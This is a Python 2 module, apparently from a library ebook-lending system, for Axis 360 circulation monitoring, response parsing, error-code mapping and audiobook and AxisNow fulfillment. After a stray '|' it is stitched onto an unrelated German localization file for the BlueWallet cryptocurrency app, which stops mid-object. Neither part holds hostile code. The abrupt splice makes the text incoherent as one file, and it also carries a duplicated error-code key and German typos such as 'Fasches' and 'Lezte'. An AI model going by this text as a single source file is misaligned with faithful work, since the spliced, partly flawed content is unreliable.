data = json.loads(token)
return data['access_token']
def _make_request(self, url, method, headers, data=None, params=None,
**kwargs):
"""Actually make an HTTP request."""
return HTTP.request_with_timeout(
method, url, headers=headers, data=data,
params=params, **kwargs
)
class Axis360CirculationMonitor(CollectionMonitor, TimelineMonitor):
"""Maintain LicensePools for Axis 360 titles.
"""
SERVICE_NAME = "Axis 360 Circulation Monitor"
INTERVAL_SECONDS = 60
DEFAULT_BATCH_SIZE = 50
PROTOCOL = ExternalIntegration.AXIS_360
DEFAULT_START_TIME = datetime(1970, 1, 1)
def __init__(self, _db, collection, api_class=Axis360API):
super(Axis360CirculationMonitor, self).__init__(_db, collection)
if isinstance(api_class, Axis360API):
# Use a preexisting Axis360API instance rather than
# creating a new one.
self.api = api_class
else:
self.api = api_class(_db, collection)
self.batch_size = self.DEFAULT_BATCH_SIZE
self.bibliographic_coverage_provider = (
Axis360BibliographicCoverageProvider(collection, api_class=self.api)
)
def catch_up_from(self, start, cutoff, progress):
"""Find Axis 360 books that changed recently.
:progress: A TimestampData representing the time previously
covered by this Monitor.
"""
count = 0
for bibliographic, circulation in self.api.recent_activity(start):
self.process_book(bibliographic, circulation)
count += 1
if count % self.batch_size == 0:
self._db.commit()
progress.achievements = "Modified titles: %d." % count
def process_book(self, bibliographic, circulation):
edition, new_edition, license_pool, new_license_pool = self.api.update_book(
bibliographic, circulation
)
if new_license_pool or new_edition:
# At this point we have done work equivalent to that done by
# the Axis360BibliographicCoverageProvider. Register that the
# work has been done so we don't have to do it again.
identifier = edition.primary_identifier
self.bibliographic_coverage_provider.handle_success(identifier)
self.bibliographic_coverage_provider.add_coverage_record_for(
identifier
)
return edition, license_pool
class MockAxis360API(Axis360API):
@classmethod
def mock_collection(self, _db, name="Test Axis 360 Collection"):
"""Create a mock Axis 360 collection for use in tests."""
library = DatabaseTest.make_default_library(_db)
collection, ignore = get_one_or_create(
_db, Collection,
name=name,
create_method_kwargs=dict(
external_account_id=u'c',
)
)
integration = collection.create_external_integration(
protocol=ExternalIntegration.AXIS_360
)
integration.username = u'a'
integration.password = u'b'
integration.url = u"http://axis.test/"
library.collections.append(collection)
return collection
def __init__(self, _db, collection, with_token=True, **kwargs):
"""Constructor.
:param collection: Get Axis 360 credentials from this
Collection.
:param with_token: If True, this class will assume that
it already has a valid token, and will not go through
the motions of negotiating one with the mock server.
"""
super(MockAxis360API, self).__init__(_db, collection, **kwargs)
if with_token:
self.token = "mock token"
self.responses = []
self.requests = []
def queue_response(self, status_code, headers={}, content=None):
from core.testing import MockRequestsResponse
self.responses.insert(
0, MockRequestsResponse(status_code, headers, content)
)
def _make_request(self, url, *args, **kwargs):
self.requests.append([url, args, kwargs])
response = self.responses.pop()
return HTTP._process_response(
url, response, kwargs.get('allowed_response_codes'),
kwargs.get('disallowed_response_codes')
)
class Axis360BibliographicCoverageProvider(BibliographicCoverageProvider):
"""Fill in bibliographic metadata for Axis 360 records.
Currently this is only used by BibliographicRefreshScript. It's
not normally necessary because the Axis 360 API combines
bibliographic and availability data. We rely on Monitors to fetch
availability data and fill in the bibliographic data as necessary.
"""
SERVICE_NAME = "Axis 360 Bibliographic Coverage Provider"
DATA_SOURCE_NAME = DataSource.AXIS_360
PROTOCOL = ExternalIntegration.AXIS_360
INPUT_IDENTIFIER_TYPES = Identifier.AXIS_360_ID
DEFAULT_BATCH_SIZE = 25
def __init__(self, collection, api_class=Axis360API, **kwargs):
"""Constructor.
:param collection: Provide bibliographic coverage to all
Axis 360 books in the given Collection.
:param api_class: Instantiate this class with the given Collection,
rather than instantiating Axis360API.
"""
super(Axis360BibliographicCoverageProvider, self).__init__(
collection, **kwargs
)
if isinstance(api_class, Axis360API):
# We were given a specific Axis360API instance to use.
self.api = api_class
else:
# A web application should not use this option because it
# will put a non-scoped session in the mix.
_db = Session.object_session(collection)
self.api = api_class(_db, collection)
self.parser = BibliographicParser()
def process_batch(self, identifiers):
identifier_strings = self.api.create_identifier_strings(identifiers)
response = self.api.availability(title_ids=identifier_strings)
seen_identifiers = set()
batch_results = []
for metadata, availability in self.parser.process_all(response.content):
identifier, is_new = metadata.primary_identifier.load(self._db)
if not identifier in identifiers:
# Axis 360 told us about a book we didn't ask
# for. This shouldn't happen, but if it does we should
# do nothing further.
continue
seen_identifiers.add(identifier.identifier)
result = self.set_metadata(identifier, metadata)
if not isinstance(result, CoverageFailure):
result = self.handle_success(identifier)
batch_results.append(result)
# Create a CoverageFailure object for each original identifier
# not mentioned in the results.
for identifier_string in identifier_strings:
if identifier_string not in seen_identifiers:
identifier, ignore = Identifier.for_foreign_id(
self._db, Identifier.AXIS_360_ID, identifier_string
)
result = self.failure(
identifier, "Book not in collection", transient=False
)
batch_results.append(result)
return batch_results
def handle_success(self, identifier):
return self.set_presentation_ready(identifier)
def process_item(self, identifier):
results = self.process_batch([identifier])
return results[0]
class AxisCollectionReaper(IdentifierSweepMonitor):
"""Check for books that are in the local collection but have left our
Axis 360 collection.
"""
SERVICE_NAME = "Axis Collection Reaper"
INTERVAL_SECONDS = 3600*12
PROTOCOL = ExternalIntegration.AXIS_360
def __init__(self, _db, collection, api_class=Axis360API):
super(AxisCollectionReaper, self).__init__(_db, collection)
if isinstance(api_class, Axis360API):
# Use a preexisting Axis360API instance rather than
# creating a new one.
self.api = api_class
else:
self.api = api_class(_db, collection)
def process_items(self, identifiers):
self.api.update_licensepools_for_identifiers(identifiers)
class Axis360Parser(XMLParser):
NS = {"axis": "http://axis360api.baker-taylor.com/vendorAPI"}
SHORT_DATE_FORMAT = "%m/%d/%Y"
FULL_DATE_FORMAT_IMPLICIT_UTC = "%m/%d/%Y %I:%M:%S %p"
FULL_DATE_FORMAT = "%m/%d/%Y %I:%M:%S %p +00:00"
def _xpath1_boolean(self, e, target, ns, default=False):
text = self.text_of_optional_subtag(e, target, ns)
if text is None:
return default
if text == 'true':
return True
else:
return False
def _xpath1_date(self, e, target, ns):
value = self.text_of_optional_subtag(e, target, ns)
if value is None:
return value
try:
attempt = datetime.strptime(
value, self.FULL_DATE_FORMAT_IMPLICIT_UTC)
value += ' +00:00'
except ValueError:
pass
return datetime.strptime(value, self.FULL_DATE_FORMAT)
class BibliographicParser(Axis360Parser):
DELIVERY_DATA_FOR_AXIS_FORMAT = {
"Blio" : None, # Legacy format, handled the same way as AxisNow
"Acoustik" : (None, DeliveryMechanism.FINDAWAY_DRM), # Audiobooks
"AxisNow" : None, # Handled specially, for ebooks only.
"ePub" : (Representation.EPUB_MEDIA_TYPE, DeliveryMechanism.ADOBE_DRM),
"PDF" : (Representation.PDF_MEDIA_TYPE, DeliveryMechanism.ADOBE_DRM),
}
log = logging.getLogger("Axis 360 Bibliographic Parser")
@classmethod
def parse_list(self, l):
"""Turn strings like this into lists:
FICTION / Thrillers; FICTION / Suspense; FICTION / General
Ursu, Anne ; Fortune, Eric (ILT)
"""
return [x.strip() for x in l.split(";")]
def __init__(self, include_availability=True, include_bibliographic=True):
self.include_availability = include_availability
self.include_bibliographic = include_bibliographic
def process_all(self, string):
for i in super(BibliographicParser, self).process_all(
string, "//axis:title", self.NS):
yield i
def extract_availability(self, circulation_data, element, ns):
identifier = self.text_of_subtag(element, 'axis:titleId', ns)
primary_identifier = IdentifierData(Identifier.AXIS_360_ID, identifier)
if not circulation_data:
circulation_data = CirculationData(
data_source=DataSource.AXIS_360,
primary_identifier=primary_identifier,
)
availability = self._xpath1(element, 'axis:availability', ns)
total_copies = self.int_of_subtag(availability, 'axis:totalCopies', ns)
available_copies = self.int_of_subtag(
availability, 'axis:availableCopies', ns)
size_of_hold_queue = self.int_of_subtag(
availability, 'axis:holdsQueueSize', ns)
availability_updated = self.text_of_optional_subtag(
availability, 'axis:updateDate', ns)
if availability_updated:
try:
attempt = datetime.strptime(
availability_updated, self.FULL_DATE_FORMAT_IMPLICIT_UTC)
availability_updated += ' +00:00'
except ValueError:
pass
availability_updated = datetime.strptime(
availability_updated, self.FULL_DATE_FORMAT)
circulation_data.licenses_owned=total_copies
circulation_data.licenses_available=available_copies
circulation_data.licenses_reserved=0
circulation_data.patrons_in_hold_queue=size_of_hold_queue
return circulation_data
# Axis authors with a special role have an abbreviation after their names,
# e.g. "San Ruby (FRW)"
role_abbreviation = re.compile("\(([A-Z][A-Z][A-Z])\)$")
generic_author = object()
role_abbreviation_to_role = dict(
INT=Contributor.INTRODUCTION_ROLE,
EDT=Contributor.EDITOR_ROLE,
PHT=Contributor.PHOTOGRAPHER_ROLE,
ILT=Contributor.ILLUSTRATOR_ROLE,
TRN=Contributor.TRANSLATOR_ROLE,
FRW=Contributor.FOREWORD_ROLE,
ADP=generic_author, # Author of adaptation
COR=generic_author, # Corporate author
)
@classmethod
def parse_contributor(cls, author, primary_author_found=False,
force_role=None):
"""Parse an Axis 360 contributor string.
The contributor string looks like "Butler, Octavia" or "Walt
Disney Pictures (COR)" or "Rex, Adam (ILT)". The optional
three-letter code describes the contributor's role in the
book.
:param author: The string to parse.
:param primary_author_found: If this is false, then a
contributor with no three-letter code will be treated as
the primary author. If this is true, then a contributor
with no three-letter code will be treated as just a
regular author.
:param force_role: If this is set, the contributor will be
assigned this role, no matter what. This takes precedence
over the value implied by primary_author_found.
"""
if primary_author_found:
default_author_role = Contributor.AUTHOR_ROLE
else:
default_author_role = Contributor.PRIMARY_AUTHOR_ROLE
role = default_author_role
match = cls.role_abbreviation.search(author)
if match:
role_type = match.groups()[0]
role = cls.role_abbreviation_to_role.get(
role_type, Contributor.UNKNOWN_ROLE)
if role is cls.generic_author:
role = default_author_role
author = author[:-5].strip()
if force_role:
role = force_role
return ContributorData(
sort_name=author, roles=[role]
)
def extract_bibliographic(self, element, ns):
"""Turn bibliographic metadata into a Metadata and a CirculationData objects,
and return them as a tuple."""
# TODO: These are consistently empty (some are clearly for
# audiobooks) so I don't know what they do and/or what format
# they're in.
#
# edition
# runtime
identifier = self.text_of_subtag(element, 'axis:titleId', ns)
isbn = self.text_of_optional_subtag(element, 'axis:isbn', ns)
title = self.text_of_subtag(element, 'axis:productTitle', ns)
contributor = self.text_of_optional_subtag(
element, 'axis:contributor', ns)
contributors = []
found_primary_author = False
if contributor:
for c in self.parse_list(contributor):
contributor = self.parse_contributor(
c, found_primary_author)
if Contributor.PRIMARY_AUTHOR_ROLE in contributor.roles:
found_primary_author = True
contributors.append(contributor)
narrator = self.text_of_optional_subtag(
element, 'axis:narrator', ns
)
if narrator:
for n in self.parse_list(narrator):
contributor = self.parse_contributor(
n, force_role=Contributor.NARRATOR_ROLE
)
contributors.append(contributor)
links = []
description = self.text_of_optional_subtag(
element, 'axis:annotation', ns
)
if description:
links.append(
LinkData(
rel=Hyperlink.DESCRIPTION,
content=description,
media_type=Representation.TEXT_PLAIN,
)
)
subject = self.text_of_optional_subtag(element, 'axis:subject', ns)
subjects = []
if subject:
for subject_identifier in self.parse_list(subject):
subjects.append(
SubjectData(
type=Subject.BISAC, identifier=None,
name=subject_identifier,
weight=Classification.TRUSTED_DISTRIBUTOR_WEIGHT
)
)
publication_date = self.text_of_optional_subtag(
element, 'axis:publicationDate', ns)
if publication_date:
publication_date = datetime.strptime(
publication_date, self.SHORT_DATE_FORMAT)
series = self.text_of_optional_subtag(element, 'axis:series', ns)
publisher = self.text_of_optional_subtag(element, 'axis:publisher', ns)
imprint = self.text_of_optional_subtag(element, 'axis:imprint', ns)
audience = self.text_of_optional_subtag(element, 'axis:audience', ns)
if audience:
subjects.append(
SubjectData(
type=Subject.AXIS_360_AUDIENCE,
identifier=audience,
weight=Classification.TRUSTED_DISTRIBUTOR_WEIGHT,
)
)
language = self.text_of_subtag(element, 'axis:language', ns)
thumbnail_url = self.text_of_optional_subtag(
element, 'axis:imageUrl', ns
)
if thumbnail_url:
# We presume all images from this service are JPEGs.
media_type = MediaTypes.JPEG_MEDIA_TYPE
if '/Medium/' in thumbnail_url:
# We know about a URL hack for this service that lets us
# get a larger image.
full_size_url = thumbnail_url.replace("/Medium/", "/Large/")
else:
# If the URL hack won't work, treat the image we got
# as both the full-sized image and its thumbnail.
# This won't happen unless B&T changes the service.
full_size_url = thumbnail_url
thumbnail = LinkData(
rel=LinkRelations.THUMBNAIL_IMAGE,
href=thumbnail_url,
media_type=media_type
)
image = LinkData(
rel=LinkRelations.IMAGE,
href=full_size_url,
media_type=media_type,
thumbnail=thumbnail
)
links.append(image)
# We don't use this for anything.
# file_size = self.int_of_optional_subtag(element, 'axis:fileSize', ns)
primary_identifier = IdentifierData(Identifier.AXIS_360_ID, identifier)
identifiers = []
if isbn:
identifiers.append(IdentifierData(Identifier.ISBN, isbn))
formats = []
acceptable = False
seen_formats = []
# All of the formats we don't support, like Blio, are ebook
# formats. If this is an audiobook format (Acoustik), we'll
# hear about it below.
medium = Edition.BOOK_MEDIUM
# If AxisNow is mentioned as a format, and this turns out to be a book,
# we'll be adding an extra delivery mechanism.
axisnow_seen = False
# Blio is an older ebook format now used as an alias for AxisNow.
blio_seen = False
for format_tag in self._xpath(
element, 'axis:availability/axis:availableFormats/axis:formatName',
ns
):
informal_name = format_tag.text
seen_formats.append(informal_name)
if informal_name == "Blio":
# We will be adding an AxisNow FormatData.
blio_seen = True
continue
elif informal_name == Axis360API.AXISNOW:
# We will only be adding an AxisNow FormatData if this
# turns out to be an ebook.
axisnow_seen = True
continue
if informal_name not in self.DELIVERY_DATA_FOR_AXIS_FORMAT:
self.log.warn("Unrecognized Axis format name for %s: %s" % (
identifier, informal_name
))
elif self.DELIVERY_DATA_FOR_AXIS_FORMAT.get(informal_name):
content_type, drm_scheme = self.DELIVERY_DATA_FOR_AXIS_FORMAT[
informal_name
]
formats.append(
FormatData(content_type=content_type, drm_scheme=drm_scheme)
)
if drm_scheme == DeliveryMechanism.FINDAWAY_DRM:
medium = Edition.AUDIO_MEDIUM
else:
medium = Edition.BOOK_MEDIUM
if (blio_seen or (axisnow_seen and medium == Edition.BOOK_MEDIUM)):
# This ebook is available through AxisNow. Add an
# appropriate FormatData.
#
# Audiobooks may also be available through AxisNow, but we
# currently ignore that fact.
formats.append(
FormatData(content_type=None, drm_scheme=DeliveryMechanism.AXISNOW_DRM)
)
if not formats:
self.log.error(
"No supported format for %s (%s)! Saw: %s", identifier,
title, ", ".join(seen_formats)
)
metadata = Metadata(
data_source=DataSource.AXIS_360,
title=title,
language=language,
medium=medium,
series=series,
publisher=publisher,
imprint=imprint,
published=publication_date,
primary_identifier=primary_identifier,
identifiers=identifiers,
subjects=subjects,
contributors=contributors,
links=links,
)
circulationdata = CirculationData(
data_source=DataSource.AXIS_360,
primary_identifier=primary_identifier,
formats=formats,
)
metadata.circulation = circulationdata
return metadata
def process_one(self, element, ns):
if self.include_bibliographic:
bibliographic = self.extract_bibliographic(element, ns)
else:
bibliographic = None
passed_availability = None
if bibliographic and bibliographic.circulation:
passed_availability = bibliographic.circulation
if self.include_availability:
availability = self.extract_availability(circulation_data=passed_availability, element=element, ns=ns)
else:
availability = None
return bibliographic, availability
class ResponseParser(Axis360Parser):
id_type = Identifier.AXIS_360_ID
SERVICE_NAME = "Axis 360"
# Map Axis 360 error codes to our circulation exceptions.
code_to_exception = {
315 : InvalidInputException, # Bad password
316 : InvalidInputException, # DRM account already exists
1000 : PatronAuthorizationFailedException,
1001 : PatronAuthorizationFailedException,
1002 : PatronAuthorizationFailedException,
1003 : PatronAuthorizationFailedException,
2000 : LibraryAuthorizationFailedException,
2001 : LibraryAuthorizationFailedException,
2002 : LibraryAuthorizationFailedException,
2003 : LibraryAuthorizationFailedException, # "Encoded input parameters exceed limit", whatever that meaus
2004 : LibraryAuthorizationFailedException,
2005 : LibraryAuthorizationFailedException, # Invalid credentials
2005 : LibraryAuthorizationFailedException, # Wrong library ID
2007 : LibraryAuthorizationFailedException, # Invalid library ID
2008 : LibraryAuthorizationFailedException, # Invalid library ID
3100 : LibraryInvalidInputException, # Missing title ID
3101 : LibraryInvalidInputException, # Missing patron ID
3102 : LibraryInvalidInputException, # Missing email address (for hold notification)
3103 : NotFoundOnRemote, # Invalid title ID
3104 : LibraryInvalidInputException, # Invalid Email Address (for hold notification)
3105 : PatronAuthorizationFailedException, # Invalid Account Credentials
3106 : InvalidInputException, # Loan Period is out of bounds
3108 : InvalidInputException, # DRM Credentials Required
3109 : InvalidInputException, # Hold already exists or hold does not exist, depending.
3110 : AlreadyCheckedOut,
3111 : CurrentlyAvailable,
3112 : CannotFulfill,
3113 : CannotLoan,
(3113, "Title ID is not available for checkout") : NoAvailableCopies,
3114 : PatronLoanLimitReached,
3115 : LibraryInvalidInputException, # Missing DRM format
3117 : LibraryInvalidInputException, # Invalid DRM format
3118 : LibraryInvalidInputException, # Invalid Patron credentials
3119 : LibraryAuthorizationFailedException, # No Blio account
3120 : LibraryAuthorizationFailedException, # No Acoustikaccount
3123 : PatronAuthorizationFailedException, # Patron Session ID expired
3126 : LibraryInvalidInputException, # Invalid checkout format
3127 : InvalidInputException, # First name is required
3128 : InvalidInputException, # Last name is required
3130 : LibraryInvalidInputException, # Invalid hold format (?)
3131 : RemoteInitiatedServerError, # Custom error message (?)
3132 : LibraryInvalidInputException, # Invalid delta datetime format
3134 : LibraryInvalidInputException, # Delta datetime format must not be in the future
3135 : NoAcceptableFormat,
3136 : LibraryInvalidInputException, # Missing checkout format
5000 : RemoteInitiatedServerError,
5003 : LibraryInvalidInputException, # Missing TransactionID
5004 : LibraryInvalidInputException, # Missing TransactionID
}
def __init__(self, collection):
"""Constructor.
:param collection: A Collection, in case parsing this document
results in the creation of LoanInfo or HoldInfo objects.
"""
self.collection = collection
def raise_exception_on_error(self, e, ns, custom_error_classes={}):
"""Raise an error if the given lxml node represents an Axis 360 error
condition.
"""
code = self._xpath1(e, '//axis:status/axis:code', ns)
message = self._xpath1(e, '//axis:status/axis:statusMessage', ns)
if message is None:
message = etree.tostring(e)
else:
message = message.text
if code is None:
# Something is so wrong that we don't know what to do.
raise RemoteInitiatedServerError(message, self.SERVICE_NAME)
return self._raise_exception_on_error(
code.text, message, custom_error_classes
)
@classmethod
def _raise_exception_on_error(cls, code, message, custom_error_classes={}):
try:
code = int(code)
except ValueError:
# Non-numeric code? Inconcievable!
raise RemoteInitiatedServerError(
"Invalid response code from Axis 360: %s" % code,
cls.SERVICE_NAME
)
for d in custom_error_classes, cls.code_to_exception:
if (code, message) in d:
raise d[(code, message)]
elif code in d:
# Something went wrong and we know how to turn it into a
# specific exception.
error_class = d[code]
if error_class is RemoteInitiatedServerError:
e = error_class(message, cls.SERVICE_NAME)
else:
e = error_class(message)
raise e
return code, message
class CheckoutResponseParser(ResponseParser):
def process_all(self, string):
for i in super(CheckoutResponseParser, self).process_all(
string, "//axis:checkoutResult", self.NS):
return i
def process_one(self, e, namespaces):
"""Either turn the given document into a LoanInfo
object, or raise an appropriate exception.
"""
self.raise_exception_on_error(e, namespaces)
# If we get to this point it's because the checkout succeeded.
expiration_date = self._xpath1(e, '//axis:expirationDate', namespaces)
fulfillment_url = self._xpath1(e, '//axis:url', namespaces)
if fulfillment_url is not None:
fulfillment_url = fulfillment_url.text
if expiration_date is not None:
expiration_date = expiration_date.text
expiration_date = datetime.strptime(
expiration_date, self.FULL_DATE_FORMAT)
loan_start = datetime.utcnow()
loan = LoanInfo(
collection=self.collection, data_source_name=DataSource.AXIS_360,
identifier_type=self.id_type, identifier=None,
start_date=loan_start,
end_date=expiration_date,
)
return loan
class HoldResponseParser(ResponseParser):
def process_all(self, string):
for i in super(HoldResponseParser, self).process_all(
string, "//axis:addtoholdResult", self.NS):
return i
def process_one(self, e, namespaces):
"""Either turn the given document into a HoldInfo
object, or raise an appropriate exception.
"""
self.raise_exception_on_error(
e, namespaces, {3109 : AlreadyOnHold})
# If we get to this point it's because the hold place succeeded.
queue_position = self._xpath1(
e, '//axis:holdsQueuePosition', namespaces)
if queue_position is None:
queue_position = None
else:
try:
queue_position = int(queue_position.text)
except ValueError:
print "Invalid queue position: %s" % queue_position
queue_position = None
hold_start = datetime.utcnow()
# NOTE: The caller needs to fill in Collection -- we have no idea
# what collection this is.
hold = HoldInfo(
collection=self.collection, data_source_name=DataSource.AXIS_360,
identifier_type=self.id_type, identifier=None,
start_date=hold_start, end_date=None, hold_position=queue_position)
return hold
class HoldReleaseResponseParser(ResponseParser):
def process_all(self, string):
for i in super(HoldReleaseResponseParser, self).process_all(
string, "//axis:removeholdResult", self.NS):
return i
def post_process(self, i):
"""Unlike other ResponseParser subclasses, we don't return any type of
\*Info object, so there's no need to do any post-processing.
"""
return i
def process_one(self, e, namespaces):
# There's no data to gather here. Either there was an error
# or we were successful.
self.raise_exception_on_error(
e, namespaces, {3109 : NotOnHold})
return True
class AvailabilityResponseParser(ResponseParser):
def __init__(self, api, internal_format=None):
"""Constructor.
:param api: An Axis360API instance, in case the parsing of an
availability document triggers additional API requests.
:param internal_format: The name Axis 360 gave to the format
the user requested. Used to distinguish books
checked out through the AxisNow Book Vault from books checked
out through ACS.
"""
self.api = api
self.internal_format = internal_format
super(AvailabilityResponseParser, self).__init__(api.collection)
def process_all(self, string):
for info in super(AvailabilityResponseParser, self).process_all(
string, "//axis:title", self.NS):
# Filter out books where nothing in particular is
# happening.
if info:
yield info
def process_one(self, e, ns):
# Figure out which book we're talking about.
axis_identifier = self.text_of_subtag(e, "axis:titleId", ns)
availability = self._xpath1(e, 'axis:availability', ns)
if availability is None:
return None
reserved = self._xpath1_boolean(availability, 'axis:isReserved', ns)
checked_out = self._xpath1_boolean(availability, 'axis:isCheckedout', ns)
on_hold = self._xpath1_boolean(availability, 'axis:isInHoldQueue', ns)
info = None
if checked_out:
start_date = self._xpath1_date(
availability, 'axis:checkoutStartDate', ns)
end_date = self._xpath1_date(
availability, 'axis:checkoutEndDate', ns)
download_url = self.text_of_optional_subtag(
availability, 'axis:downloadUrl', ns)
transaction_id = self.text_of_optional_subtag(
availability, 'axis:transactionID', ns) or ""
# Arguments common to FulfillmentInfo and
# Axis360FulfillmentInfo.
kwargs = dict(
data_source_name=DataSource.AXIS_360,
identifier_type=self.id_type,
identifier=axis_identifier
)
if download_url and self.internal_format != self.api.AXISNOW:
# The patron wants a direct link to the book, which we can deliver
# immediately, without making any more API requests.
fulfillment = FulfillmentInfo(
collection=self.collection,
content_link=download_url,
content_type=DeliveryMechanism.ADOBE_DRM,
content=None,
content_expires=None,
**kwargs
)
elif transaction_id:
# We will eventually need to make a request to the
# "getfulfillmentInfo" endpoint, using this
# transaction ID.
#
# For a book delivered in AxisNow format, this will give
# us the Book Vault UUID and ISBN.
#
# For an audiobook, this will give us the Findaway
# content ID, license ID, and session key. We'll also
# need to make a second request to get the audiobook
# metadata.
#
# Axis360FulfillmentInfo can handle both cases.
fulfillment = Axis360FulfillmentInfo(
api=self.api, key=transaction_id, **kwargs
)
else:
# We're out of luck -- we can't fulfill this loan.
fulfillment = None
info = LoanInfo(
collection=self.collection,
data_source_name=DataSource.AXIS_360,
identifier_type=self.id_type,
identifier=axis_identifier,
start_date=start_date, end_date=end_date,
fulfillment_info=fulfillment
)
elif reserved:
end_date = self._xpath1_date(
availability, 'axis:reservedEndDate', ns)
info = HoldInfo(
collection=self.collection,
data_source_name=DataSource.AXIS_360,
identifier_type=self.id_type,
identifier=axis_identifier,
start_date=None,
end_date=end_date,
hold_position=0
)
elif on_hold:
position = self.int_of_optional_subtag(
availability, 'axis:holdsQueuePosition', ns)
info = HoldInfo(
collection=self.collection,
data_source_name=DataSource.AXIS_360,
identifier_type=self.id_type,
identifier=axis_identifier,
start_date=None, end_date=None,
hold_position=position)
return info
class JSONResponseParser(ResponseParser):
"""Most ResponseParsers parse XML documents; subclasses of
JSONResponseParser parse JSON documents.
This only subclasses ResponseParser so it can reuse
_raise_exception_on_error.
"""
@classmethod
def _required_key(cls, key, json_obj):
"""Raise an exception if the given key is not present in the given
object.
"""
if json_obj is None or key not in json_obj:
raise RemoteInitiatedServerError(
"Required key %s not present in Axis 360 fulfillment document: %s" % (
key, json_obj,
),
cls.SERVICE_NAME
)
return json_obj[key]
@classmethod
def verify_status_code(cls, parsed):
"""Assert that the incoming JSON document represents a successful
response.
"""
k = cls._required_key
status = k('Status', parsed)
code = k('Code', status)
message = status.get('Message')
# If the document describes an error condition, raise
# an appropriate exception immediately.
cls._raise_exception_on_error(code, message)
def parse(self, data, *args, **kwargs):
"""Parse a JSON document."""
if isinstance(data, dict):
parsed = data # already parsed
else:
try:
parsed = json.loads(data)
except ValueError, e:
# It's not JSON.
raise RemoteInitiatedServerError(
"Invalid response from Axis 360 (was expecting JSON): %s" % data,
self.SERVICE_NAME
)
# If the response indicates an error condition, don't continue --
# raise an exception immediately.
self.verify_status_code(parsed)
return self._parse(parsed, *args, **kwargs)
def _parse(self, parsed, *args, **kwargs):
"""Parse a document we know to represent success on the
API level. Called by parse() once the high-level details
have been worked out.
"""
raise NotImplementedError()
class Axis360FulfillmentInfoResponseParser(JSONResponseParser):
"""Parse JSON documents into Findaway audiobook manifests or AxisNow manifests."""
def __init__(self, api):
"""Constructor.
:param api: An Axis360API instance, in case the parsing of
a fulfillment document triggers additional API requests.
"""
self.api = api
super(Axis360FulfillmentInfoResponseParser, self).__init__(
self.api.collection
)
def _parse(self, parsed, license_pool):
"""Extract all useful information from a parsed FulfillmentInfo
response.
:param parsed: A dictionary corresponding to a parsed JSON
document.
:param license_pool: The LicensePool for the book that's
being fulfilled.
:return: A 2-tuple (manifest, expiration_date). `manifest` is either
a FindawayManifest (for an audiobook) or an AxisNowManifest (for an ebook).
"""
expiration_date = self._required_key('ExpirationDate', parsed)
expiration_date = self.parse_date(expiration_date)
if 'FNDTransactionID' in parsed:
manifest = self.parse_findaway(parsed, license_pool)
else:
manifest = self.parse_axisnow(parsed)
return manifest, expiration_date
def parse_date(self, date):
if '.' in date:
# Remove 7(?!) decimal places of precision and
# UTC timezone, which are more trouble to parse
# than they're worth.
date = date[:date.rindex('.')]
try:
date = datetime.strptime(date, "%Y-%m-%d %H:%M:%S")
except ValueError:
raise RemoteInitiatedServerError(
"Could not parse expiration date: %s" % date,
self.SERVICE_NAME
)
return date
def parse_findaway(self, parsed, license_pool):
k = self._required_key
fulfillmentId = k('FNDContentID', parsed)
licenseId = k('FNDLicenseID', parsed)
sessionKey = k('FNDSessionKey', parsed)
checkoutId = k('FNDTransactionID', parsed)
# Acquire the TOC information
metadata_response = self.api.get_audiobook_metadata(fulfillmentId)
parser = AudiobookMetadataParser(self.api.collection)
accountId, spine_items = parser.parse(metadata_response.content)
return FindawayManifest(
license_pool, accountId=accountId, checkoutId=checkoutId,
fulfillmentId=fulfillmentId, licenseId=licenseId,
sessionKey=sessionKey, spine_items=spine_items
)
def parse_axisnow(self, parsed):
k = self._required_key
isbn = k('ISBN', parsed)
book_vault_uuid = k('BookVaultUUID', parsed)
return AxisNowManifest(book_vault_uuid, isbn)
class AudiobookMetadataParser(JSONResponseParser):
"""Parse the results of Axis 360's audiobook metadata API call.
"""
@classmethod
def _parse(cls, parsed):
spine_items = []
accountId = parsed.get('fndaccountid', None)
for item in parsed.get('readingOrder', []):
spine_item = cls._extract_spine_item(item)
if spine_item:
spine_items.append(spine_item)
return accountId, spine_items
@classmethod
def _extract_spine_item(cls, part):
"""Convert an element of the 'readingOrder' list to a SpineItem."""
title = part.get('title')
# Incoming duration is measured in seconds.
duration = part.get('duration', 0)
part_number = int(part.get('fndpart', 0))
sequence = int(part.get('fndsequence', 0))
return SpineItem(title, duration, part_number, sequence)
class AxisNowManifest(object):
"""A simple media type for conveying an entry point into the AxisNow access control
system.
"""
MEDIA_TYPE = DeliveryMechanism.AXISNOW_DRM
def __init__(self, book_vault_uuid, isbn):
"""Constructor.
:param book_vault_uuid: The UUID of a Book Vault.
:param isbn: The ISBN of a book in that Book Vault.
"""
self.book_vault_uuid = book_vault_uuid
self.isbn = isbn
def __unicode__(self):
data = dict(isbn=self.isbn, book_vault_uuid=self.book_vault_uuid)
return json.dumps(data, sort_keys=True)
class Axis360FulfillmentInfo(APIAwareFulfillmentInfo):
"""An Axis 360-specific FulfillmentInfo implementation for audiobooks
and books served through AxisNow.
We use these instead of normal FulfillmentInfo objects because
putting all this information into FulfillmentInfo would require
one or two extra HTTP requests, and there's often no need to make
those requests.
"""
def do_fetch(self):
_db = self.api._db
license_pool = self.license_pool(_db)
transaction_id = self.key
response = self.api.get_fulfillment_info(transaction_id)
parser = Axis360FulfillmentInfoResponseParser(self.api)
manifest, expires = parser.parse(response.content, license_pool)
self._content = unicode(manifest)
self._content_type = manifest.MEDIA_TYPE
self._content_expires = expires
|
module.exports = {
_: {
storage_is_encrypted: 'Dein Speicher ist verschlüsselt. Zum Entschlüsseln wird ein Passwort benötigt.',
enter_password: 'Gib das Passwort ein',
bad_password: 'Fasches Passwort, nächster Versuch',
never: 'nie',
continue: 'Weiter',
ok: 'OK',
},
wallets: {
select_wallet: 'Wähle eine Wallet',
options: 'Einstellungen',
createBitcoinWallet:
'Um eine Lightning wallet zu verwenden, muss erstmal eine Bitcoin Wallet eingerichtet werden. Bitte erstell oder importier eine Bitcoin Wallet.',
list: {
app_name: 'BlueWallet',
title: 'Wallets',
header:
'Eine Wallet spiegelt ein Paar kryptographische Schlüssel wider. Einen geheimen Schlüseel und eine Adresse als öffentlichen Schlüssel. Den öffentlichen Schlüssel kann man zum Empfang von Bitcoin teilen.',
add: 'Wallet hinzufügen',
create_a_wallet: 'Wallet erstellen',
create_a_wallet1: 'Es ist kostenlos und du kannst',
create_a_wallet2: 'so viele Wallets erstellen, wie du möchtest',
latest_transaction: 'Lezte Transaktion',
empty_txs1: 'Deine Transaktionen erscheinen hier',
empty_txs2: 'Noch keine Transaktionen',
empty_txs1_lightning:
'Lightning wallet should be used for your daily transactions. Fees are unfairly cheap and speed is blazing fast.',
